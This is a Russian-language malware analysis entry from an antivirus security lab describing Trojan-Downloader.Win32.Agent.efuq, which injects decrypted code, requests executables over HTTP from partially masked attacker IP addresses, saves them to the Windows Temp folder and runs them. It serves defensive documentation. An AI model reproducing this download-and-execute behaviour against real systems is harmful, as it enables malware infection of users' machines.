Security Lab

Trojan-Downloader.Win32. Agent.efuq

Trojan-Downloader.Win32. Agent.efuq

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл).

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл). Имеет размер 20992 байта. Написана на C++.


name="doc3">

Деструктивная активность

После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как "Trojan-Downloader.Win32.Agent.cngp"). Внедренный код выполняет следующие действия:

  • устанавливает соединение с хостами:
    188.***.161   
    194.***.3
  • В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:
    GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
    Host: 188.***.161

    GET /bat.exe HTTP/1.0
    Host: 188.***.161

    GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
    Host: 194.***.3

    GET /bat.exe HTTP/1.0
    Host: 194.***.3
  • В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:
    %WinDir%\Temp\_ex-<rnd>.exe
    где <rnd> – случайные двухзначные десятичные числа. На момент создания описания файлы не загружались.
  • Запускает на выполнение загруженные файлы.

Ваша цифровая безопасность — это пазл, и у нас есть недостающие детали

Подпишитесь, чтобы собрать полную картину